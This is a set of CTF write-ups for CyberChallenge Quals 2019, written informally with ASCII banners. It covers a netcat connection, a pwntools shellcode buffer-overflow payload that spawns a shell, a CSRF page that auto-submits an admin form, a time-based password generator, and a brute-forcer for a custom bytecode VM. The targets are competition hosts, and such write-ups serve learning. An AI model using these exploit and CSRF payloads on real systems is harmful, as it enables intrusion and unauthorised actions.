CyberChallenge Quals 2019 WRITEUPS

1. /*
2. NOTICE:
3. My english is fuckin bad, PLUS I wrote this in like 20 mins. Sorry if I fucked up badly all the grammar :(
4. Open this page with desktop-view to enjoy ASCII arts! :D
5. ██╗     ██╗███╗   ██╗██╗  ██╗███████╗
6. ██║     ██║████╗  ██║██║ ██╔╝██╔════╝
7. ██║     ██║██╔██╗ ██║█████╔╝ ███████╗
8. ██║     ██║██║╚██╗██║██╔═██╗ ╚════██║
9. ███████╗██║██║ ╚████║██║  ██╗███████║
10. ╚══════╝╚═╝╚═╝  ╚═══╝╚═╝  ╚═╝╚══════╝
11. Instagram: https://instagram.com/stranck/
12. Telegram shitpost channel: https://t.me/Stranck
13. YouTube channel: https://www.youtube.com/channel/UCmMWUz0QZ7WhIBx-1Dz-IGg
14.  
15. ██████╗  ██████╗  ██████╗ ██████╗
16. ██╔══██╗██╔═══██╗██╔═══██╗██╔══██╗
17. ██║  ██║██║   ██║██║   ██║██████╔╝
18. ██║  ██║██║   ██║██║   ██║██╔══██╗
19. ██████╔╝╚██████╔╝╚██████╔╝██║  ██║
20. ╚═════╝  ╚═════╝  ╚═════╝ ╚═╝  ╚═╝
21. CHALL Write-Up
22. --------------
23.  
24. Lol I executed the command lmao
25.  
26. Attack Payload
27. --------------
28.  
29. ncat door.quals.cyberchallenge.it 1111
30.  
31. ███████╗ ██████╗ ██████╗
32. ██╔════╝██╔═══██╗██╔══██╗
33. ███████╗██║   ██║██████╔╝
34. ╚════██║██║   ██║██╔═══╝
35. ███████║╚██████╔╝██║    
36. ╚══════╝ ╚═════╝ ╚═╝    
37. CHALL Write-Up
38. --------------
39.  
40. I downloaded the executable to test it locally, and one of the first thing I tried was to get a segmentation fault by inputting a long sequence characters. It worked. So I opened in gdb and IDA and I started to reverse the code and I noticed that at the end of the program the execution returns to 0x100100. Using GDB I noticed that the input was placed at 0x1000000: hell yeah, an easy way to do a buffer overflow :D
41. I tried putting my shellcode (to get a shell) payload at 0x100100 but it didn't worked, seems like it was cutting my input. So at 0x100100 I tried putting a jump to 0x100000 and putting the payload there, but it didn't worked because python is a fucking dumbass. Instead I've put a fantastic push to the stack with the address 0x100000 and then a return instruction... It worked! :DD
42.  
43. Attack Payload
44. --------------
45. */
46. from pwn import *
47. import sys
48.  
49. pl = asm(shellcraft.sh())
50. # Don't waste A presses. Pannen won't be happy :(
51. s = pl + 'b' * (0x100 - len(pl)) + asm('push 0x100000')  + asm('ret')
52. print s
53.  
54. /*
55. ███╗   ██╗███████╗ █████╗          ██████╗ █████╗ ██████╗ ███████╗███████╗██████╗ ███████╗
56. ████╗  ██║██╔════╝██╔══██╗        ██╔════╝██╔══██╗██╔══██╗██╔════╝██╔════╝██╔══██╗██╔════╝
57. ██╔██╗ ██║███████╗███████║        ██║     ███████║██████╔╝█████╗  █████╗  ██████╔╝███████╗
58. ██║╚██╗██║╚════██║██╔══██║        ██║     ██╔══██║██╔══██╗██╔══╝  ██╔══╝  ██╔══██╗╚════██║
59. ██║ ╚████║███████║██║  ██║███████╗╚██████╗██║  ██║██║  ██║███████╗███████╗██║  ██║███████║
60. ╚═╝  ╚═══╝╚══════╝╚═╝  ╚═╝╚══════╝ ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚══════╝╚══════╝╚═╝  ╚═╝╚══════╝
61. CHALL Write-Up
62. --------------
63.  
64. The first thing I noticed was that the admin wouldn't open any links outside 10.27.x.x
65. So I thought "What if I host a webserver?"
66. So I did using python -m http.server and checking the logs I've seen that 10.27.0.1 was loading the web-pages I was hosting. Then I've put a redirect in js to another url and by checking again the logs I noticed that the admin requested also that page: this means he was executing the js code! I tried creating an iFrame to the original page, but obv the xss detector stopped my js code from accessing it. Then an idea came into my mind:
67. I've copied the form from the original page, inside mine but with the action tag pointing to the real submit page. Then I wrote some js code to "compile" automatically the form and submit it, assuming that the admin was already logged. And boom, goteeeeeeeem!
68.  
69. Attack Payload
70. --------------
71. */
72. <html>
73.     <body>
74.         <!-->iframe src="http://nsacareers.quals.cyberchallenge.it/review/00deb0dc-9c6d-4608-8f66-07add4775fbd?hire=hired!" id = "asd">
75.         </iframe-->
76.         <form method="POST" action = "http://nsacareers.quals.cyberchallenge.it/review/00deb0dc-9c6d-4608-8f66-07add4775fbd">
77.             <input type="checkbox" name="hire" value="hired!"> Hire
78.             <br class="mb-2">
79.             <input type="submit" value="Submit">
80.         </form>
81.         <script>
82.             //setTimeout(function(){
83.                 /*try{
84.                     var frame = document.getElementById("asd");
85.                     var inner = frame.contentDocument || frame.contentWindow.document;
86.                     inner.getElementsByTagName("input")[0].setAttribute("checked", "");
87.                     inner.getElementsByTagName("form")[0].submit();
88.                 } catch (asd){}*/
89.                 //document.getElementByT
90.                 document.getElementsByTagName("input")[0].setAttribute("checked", "")
91.                 document.getElementsByTagName("input")[1].click()
92.                 //location.replace("done.html");
93.             //}, 3000);
94.         </script>
95.     </body>
96. </html>
97.  
98. /*
99. ████████╗██╗███╗   ███╗███████╗
100. ╚══██╔══╝██║████╗ ████║██╔════╝
101.    ██║   ██║██╔████╔██║█████╗  
102.    ██║   ██║██║╚██╔╝██║██╔══╝  
103.    ██║   ██║██║ ╚═╝ ██║███████╗
104.    ╚═╝   ╚═╝╚═╝     ╚═╝╚══════╝
105. CHALL Write-Up
106. --------------
107.  
108. I downloaded the two keys and I used them to access the server. I downloaded from it the executable (time) and the other file. I executed time and I inputted some random strings. He gave me an error. I assumed that the string in the other file was the password, so I inputted it and this time I didn't get an error, but it was waiting again for a String. Time to reverse! :D
109. I opened the file in IDA and I noticed the "check1" and "check2" functions. I digged inside check2 and I noticed that there was a compare, between the inputted string and the result of another function: I opened it with the C view, noticing some C-standard calls (time & stuff) and a calc with the different time values. I copied the calc in a .c file, added some stuff and.... It didn't wokred, even if it should had worked. I checked what time it was on the server, noticing that it was in the PDT timezone. After some tries, I changed my pc to that timezone too (Changing it directly with PDT doesn't work :C) and... It didn't worked too. BUT after a while I executed it again and this time it worked(?????). Probably it was for the time not being exactly syncronized
110.  
111. Attack Payload
112. --------------
113. */
114. #include <stdio.h>
115. #include <time.h>
116.  
117. int main () {
118.     time_t rawtime;
119.    struct tm *v3;
120.    rawtime = time(0LL);
121.    v3 = localtime( &rawtime );
122.     /*struct tm *v3;
123.     time_t t = time(0LL);
124.     v3 = localtime(&t);*/
125.     long l = v3->tm_hour + v3->tm_min + (v3->tm_year + v3->tm_mon - v3->tm_mday) / (v3->tm_min + 1) + 3735928559LL;
126.     printf("AoHnikoj7L2fVn41\n%o\n", l);
127. }
128.  
129. /*
130. ███████╗███████╗██╗   ██╗███╗   ███╗
131. ██╔════╝╚══███╔╝██║   ██║████╗ ████║
132. █████╗    ███╔╝ ██║   ██║██╔████╔██║
133. ██╔══╝   ███╔╝  ╚██╗ ██╔╝██║╚██╔╝██║
134. ███████╗███████╗ ╚████╔╝ ██║ ╚═╝ ██║
135. ╚══════╝╚══════╝  ╚═══╝  ╚═╝     ╚═╝
136.  
137. CHALL Write-Up
138. --------------
139.  
140. TODO
141.  
142. Attack Payload
143. --------------
144. */
145. package ovh.stranck.cyberchallenge.ezVM;
146.  
147. import java.nio.file.Files;
148. import java.nio.file.Paths;
149. import java.util.ArrayList;
150. import java.util.Arrays;
151. import java.util.Scanner;
152.  
153. import ovh.stranck.ctf.App;
154. import ovh.stranck.utils.PatternBruteforcer;
155.  
156. public class Main {
157.    
158.     public static final short NOP = 0x00;
159.     public static final short IN = 0x01;
160.     public static final short STO = 0x02;
161.     public static final short ADD = 0x03;
162.     public static final short SUB = 0x04;
163.     public static final short NOT = 0x05;
164.     public static final short AND = 0x06;
165.     public static final short OR = 0x07;
166.     public static final short XOR = 0x08;
167.     public static final short CHK = 0x09;
168.     public static final boolean PRINT = false;
169.    
170.     public static Scanner sc = new Scanner(System.in);
171.     public static byte[] m = new byte[256];
172.     public static byte[] p = null;
173.     public static int pc = 0;
174.    
175.     public static String bruteforceRead;
176.     public static ArrayList<String> attemps1 = new ArrayList<String>();
177.     public static ArrayList<String> attemps2 = new ArrayList<String>();
178.    
179.     public static void main(String[] args) throws Exception{
180.         //618
181.         //p = Files.readAllBytes(Paths.get(args[0]));
182.         p = Files.readAllBytes(Paths.get("C:\\Users\\Luca\\Desktop\\shit\\programming\\CTF\\CyberChallenge 2019\\EzVM\\check_login_key"));
183.         // execute();
184.         /*PatternBruteforcer pbf = new PatternBruteforcer("@ABCDEFGHIJKLMNO", 4, true);
185.         String s = "@@@@", base1 = "@DOO-KOOO-@@@N-@IOO-", base2 = "";
186.         //while(!(s = pbf.next()).equals("")){
187.             for(int i = 0; i < m.length; i++)
188.                 m[i] = 0;
189.             pc = 0;
190.             bruteforceRead = base1 + s + base2;
191.             execute();
192.             if(pc > 618){
193.                 attemps1.add(bruteforceRead);
194.             }
195.         //}
196.         System.out.println(attemps1.toString());*/
197.         int[] pc = {259, 346, 440, 526, 618};
198.         String[] segment = {"@@@@", "@@@@", "@@@@", "@@@@", "@@@@"};
199.         bruteforce(pc, segment, 0);
200.     }
201.    
202.     public static void bruteforce(int[] pc, String[] segment, int level){
203.         PatternBruteforcer pbf = new PatternBruteforcer("@ABCDEFGHIJKLMNO", 4, true);
204.         String s;//, base1 = "@DOO-KOOO-@@@N-@IOO-", base2 = "";
205.         while(!(s = pbf.next()).equals("")){
206.             //App.wait(1);
207.             for(int i = 0; i < m.length; i++)
208.                 m[i] = 0;
209.             Main.pc = 0;
210.            
211.             String before = "", after = "";
212.             for(int i = 0; i < level; i++){
213.                 before += segment[i] + "-";
214.                 //System.out.println(i + " " + level + " " + before);
215.             }
216.             for(int i = level + 1; i < pc.length; i++){
217.                 after += "-" + segment[i];
218.                 //System.out.println(after);
219.             }
220.            
221.             bruteforceRead = before + s + after;
222.             //System.out.println(bruteforceRead);
223.             if(execute() == 0){
224.                 System.out.println("FOUND: " + bruteforceRead);
225.             } else {
226.                 if(Main.pc > pc[level]){
227.                     if(level + 1 < pc.length){
228.                         segment[level] = s;
229.                         bruteforce(pc, segment, level + 1);
230.                     }
231.                 }
232.             }
233.         }
234.     }
235.    
236.     public static int execute() {
237.         int ret = 0;
238.         loop:
239.         while(pc < p.length){
240.             if(PRINT) System.out.print(pc + ":\t");
241.             switch(p[pc++]){
242.                 case NOP: {
243.                     nop();
244.                     break;
245.                 }
246.                 case IN: {
247.                     in();
248.                     break;
249.                 }
250.                 case STO: {
251.                     sto();
252.                     break;
253.                 }
254.                 case ADD: {
255.                     add();
256.                     break;
257.                 }
258.                 case SUB: {
259.                     sub();
260.                     break;
261.                 }
262.                 case NOT: {
263.                     not();
264.                     break;
265.                 }
266.                 case AND: {
267.                     and();
268.                     break;
269.                 }
270.                 case OR: {
271.                     or();
272.                     break;
273.                 }
274.                 case XOR: {
275.                     xor();
276.                     break;
277.                 }
278.                 case CHK: {
279.                     ret = chk();
280.                     if(ret == 1) {
281.                         if(PRINT) System.out.println("Exiting at: " + pc);
282.                         break loop;
283.                     }
284.                     break;
285.                 }
286.                 default: {
287.                     if(PRINT) System.out.println(p[pc - 1] + ":\tCommand not found");
288.                 }
289.             }
290.         }
291.         return ret;
292.     }
293.    
294.     public static void nop(){
295.         if(PRINT) System.out.println("NOP");
296.     }
297.    
298.     public static void in(){
299.         short length = (short)(p[pc++] & 0xff);
300.         short mem = (short)(p[pc++] & 0xff);
301.         if(PRINT) System.out.println("IN " + length + " " + mem);
302.        
303.         //System.out.print(length + ">\t");
304.         //String in = sc.nextLine();
305.         String in = bruteforceRead;
306.         in = in.substring(0, length);
307.         byte[] b = in.getBytes();
308.         for(int i = 0; i < b.length; i++)
309.             m[mem++] = b[i];
310.     }
311.    
312.     public static void sto(){
313.         byte b = p[pc++];
314.         //short b = (short)(p[pc++] & 0xff);
315.         short mem = (short)(p[pc++] & 0xff);
316.         if(PRINT) System.out.println("STO " + (short)(b & 0xff) + " " + mem);
317.        
318.         m[mem] = b;
319.         //m[mem] = m[b];
320.     }
321.    
322.     public static void add(){
323.         short x = (short)(p[pc++] & 0xff);
324.         short y = (short)(p[pc++] & 0xff);
325.         short z = (short)(p[pc++] & 0xff);
326.         if(PRINT) System.out.println("ADD " + x + " " + y + " " + z);
327.        
328.         m[z] = (byte) (m[x] + m[y]);
329.     }
330.    
331.     public static void sub(){
332.         short x = (short)(p[pc++] & 0xff);
333.         short y = (short)(p[pc++] & 0xff);
334.         short z = (short)(p[pc++] & 0xff);
335.         if(PRINT) System.out.println("SUB " + x + " " + y + " " + z);
336.        
337.         m[z] = (byte) (m[x] - m[y]);
338.     }
339.    
340.     public static void not(){
341.         short mem = (short)(p[pc++] & 0xff);
342.         if(PRINT) System.out.println("NOT " + mem);
343.        
344.         m[mem] = (byte) ~m[mem];
345.     }
346.    
347.     public static void and(){
348.         short x = (short)(p[pc++] & 0xff);
349.         short y = (short)(p[pc++] & 0xff);
350.         short z = (short)(p[pc++] & 0xff);
351.         if(PRINT) System.out.println("AND " + x + " " + y + " " + z + "\t(" + (short)(m[x] & 0xff) + "\t" + (short)(m[y] & 0xff) + ")");
352.        
353.         m[z] = (byte) (m[x] & m[y]);
354.     }
355.    
356.     public static void or(){
357.         short x = (short)(p[pc++] & 0xff);
358.         short y = (short)(p[pc++] & 0xff);
359.         short z = (short)(p[pc++] & 0xff);
360.         if(PRINT) System.out.println("OR " + x + " " + y + " " + z + "\t(" + (short)(m[x] & 0xff) + "\t" + (short)(m[y] & 0xff) + ")");
361.        
362.         m[z] = (byte) (m[x] | m[y]);
363.     }
364.    
365.     public static void xor(){
366.         short x = (short)(p[pc++] & 0xff);
367.         short y = (short)(p[pc++] & 0xff);
368.         short z = (short)(p[pc++] & 0xff);
369.         if(PRINT) System.out.println("XOR " + x + " " + y + " " + z + "\t(" + (short)(m[x] & 0xff) + "\t" + (short)(m[y] & 0xff) + ")");
370.        
371.         m[z] = (byte) (m[x] ^ m[y]);
372.     }
373.    
374.     public static int chk(){
375.         short x = (short)(p[pc++] & 0xff);
376.         short y = (short)(p[pc++] & 0xff);
377.         if(PRINT) System.out.println("CHK " + x + " " + y + "\t(" + (short)(m[x] & 0xff) + "\t" + (short)(m[y] & 0xff) + ")");
378.        
379.         if(m[x] != m[y])
380.             return 1;
381.         return 0;
382.     }
383. }
384.  
385.  
386. package ovh.stranck.utils;
387.  
388. public class PatternBruteforcer {
389.    
390.     private String charset;
391.     private boolean overflow = false;
392.     private int index[];
393.     private int length;
394.    
395.     public PatternBruteforcer(String charset, int length, boolean fixedLength){
396.         this.charset = charset;
397.         this.length = length;
398.         index = new int[length];
399.         index[0] = -1;
400.         for(int i = 1; !fixedLength && i < length; i++)
401.             index[i] = -1;
402.     }
403.     public String getCurrent(boolean of){
404.         String s = "";
405.         for(int n = 0; !of && n < length; n++)
406.             if(index[n] >= 0)
407.                 s = charset.charAt(index[n]) + s;
408.         return s;
409.     }
410.     public synchronized String next(){
411.         if(!this.overflow){
412.             boolean overflow = true;
413.             for(int i = 0; i < length && overflow; i++){
414.                 if(++index[i] >= charset.length()){
415.                     index[i] = 0;
416.                     overflow = true;
417.                 } else {
418.                     overflow = false;
419.                 }
420.             }
421.             this.overflow = overflow;
422.         }
423.         return getCurrent(overflow);
424.     }
425.     public boolean isDone(){
426.         return overflow;
427.     }
428.    
429.    
430.    
431.     public static void bruteforceFromCharsetLength(String charset, int length, boolean fixedLength, Action a){
432.         int[] index = new int[length];
433.         index[0] = -1;
434.        
435.         for(int i = 1; !fixedLength && i < length; i++)
436.             index[i] = -1;
437.        
438.         boolean overflow = false;
439.         while(!overflow){
440.             overflow = true;
441.            
442.             for(int i = 0; i < length && overflow; i++){
443.                
444.                 if(++index[i] >= charset.length()){
445.                     index[i] = 0;
446.                     overflow = true;
447.                     //System.out.println("overflow! INDEX of: " + i + "\tVALUE: " + index[i]);
448.                 } else {
449.                     overflow = false;
450.                     //System.out.println("INDEX of: " + i + "\tVALUE: " + index[i]);
451.                    
452.                     String s = "";
453.                     for(int n = 0; n < length; n++){
454.                         //System.out.println("adding INDEX of: " + n + "\tVALUE: " + index[n]);
455.                         if(index[n] >= 0)
456.                             s = charset.charAt(index[n]) + s;
457.                     }
458.                    
459.                     a.execute(s);
460.                 }
461.             }
462.         }
463.     }
464. }